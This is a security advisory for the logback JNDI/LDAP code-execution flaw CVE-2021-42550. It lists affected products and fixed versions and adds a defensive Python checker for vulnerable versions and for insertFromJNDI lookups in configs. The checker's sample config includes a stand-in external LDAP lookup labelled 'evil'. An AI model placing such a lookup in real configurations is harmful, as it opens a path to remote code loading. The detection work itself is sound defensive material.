First published: Thu Dec 16 2021
In logback version 1.2.7 and prior versions, an attacker with the privileges required to edit configuration files could craft a malicious configuration that executes arbitrary code loaded from LDAP servers.
Credit: vulnerability@ncsc.ch
Affected Software | Affected Version | How to fix |
---|---|---|
redhat/logback-classic | <1.2.9 | 1.2.9 |
redhat/candlepin | <0:4.1.13-1.el7 | 0:4.1.13-1.el7 |
redhat/candlepin | <0:4.1.13-1.el8 | 0:4.1.13-1.el8 |
Qos Logback | <=1.2.7 | |
Qos Logback | =1.3.0-alpha0 | |
Qos Logback | =1.3.0-alpha1 | |
Qos Logback | =1.3.0-alpha10 | |
Qos Logback | =1.3.0-alpha2 | |
Qos Logback | =1.3.0-alpha3 | |
Qos Logback | =1.3.0-alpha4 | |
Qos Logback | =1.3.0-alpha5 | |
Qos Logback | =1.3.0-alpha6 | |
Qos Logback | =1.3.0-alpha7 | |
Qos Logback | =1.3.0-alpha8 | |
Qos Logback | =1.3.0-alpha9 | |
Redhat Satellite | =6.0 | |
NetApp Cloud Manager | | |
NetApp Service Level Manager | | |
NetApp Snap Creator Framework | | |
Siemens SINEC NMS | <1.0.3 | |
CVE-2021-42550 is a vulnerability found in the logback package that allows an attacker to execute arbitrary code loaded from LDAP servers.
CVE-2021-42550 has a severity level of high.
Logback versions 1.2.7 and prior are affected by CVE-2021-42550.
To fix CVE-2021-42550, upgrade to logback version 1.2.9 or higher.
You can find more information about CVE-2021-42550 at the following references: [CVE-2021-42550](https://cve.report/CVE-2021-42550), [LOGBACK-1591](https://jira.qos.ch/browse/LOGBACK-1591), [RHSA-2022:1108](https://access.redhat.com/errata/RHSA-2022:1108).
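As an added example (not code from the advisory or from the logback project), the following Python checker does two things a defender would want for this CVE: it decides whether a logback-classic version string falls inside the affected ranges listed in the table above, and it scans a logback XML configuration for the `<insertFromJNDI>` element, the configuration feature that performs a JNDI lookup. The `env-entry-name` and `as` attribute names follow logback's documented configuration syntax; the sample configuration is constructed for this example.

```python
# Added example, not from the advisory or the logback project. Element and
# attribute names follow logback's documented config syntax; sample is constructed.
import re
import xml.etree.ElementTree as ET

FIXED = (1, 2, 9)                                   # first fixed release above
AFFECTED_ALPHAS = {f"alpha{i}" for i in range(11)}  # 1.3.0-alpha0 .. alpha10 above


def version_is_affected(version: str) -> bool:
    """True if a logback-classic version string is in the affected ranges."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z0-9]+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    base = tuple(int(x) for x in m.group(1, 2, 3))
    if base == (1, 3, 0) and m.group(4) in AFFECTED_ALPHAS:
        return True
    return base < FIXED


def find_jndi_lookups(config_xml: str) -> list:
    """Report every <insertFromJNDI> element, the config feature doing JNDI lookups."""
    findings = []
    for el in ET.fromstring(config_xml).iter():
        if el.tag.lower() == "insertfromjndi":
            name = el.get("env-entry-name", "")
            findings.append({
                "env_entry_name": name,
                "as": el.get("as", ""),
                # a name outside the container's java: namespace (e.g. an
                # ldap: URL) is the pattern to block or alert on
                "external": not name.lower().startswith("java:"),
            })
    return findings


# constructed sample: one benign container lookup, one external reference
SAMPLE_CONFIG = """<configuration>
  <insertFromJNDI env-entry-name="java:comp/env/appName" as="appName"/>
  <insertFromJNDI env-entry-name="ldap://example.invalid/x" as="evil"/>
  <root level="INFO"/>
</configuration>"""

if __name__ == "__main__":
    for v in ("1.2.7", "1.2.9", "1.3.0-alpha10"):
        print(v, "affected" if version_is_affected(v) else "fixed")
    for finding in find_jndi_lookups(SAMPLE_CONFIG):
        print("JNDI lookup:", finding)
```

Run it against the configuration files an application actually loads (for example `logback.xml` on the classpath or the path given by `logback.configurationFile`); a non-`java:` entry in a config that only the deploy pipeline should write is the signal to investigate.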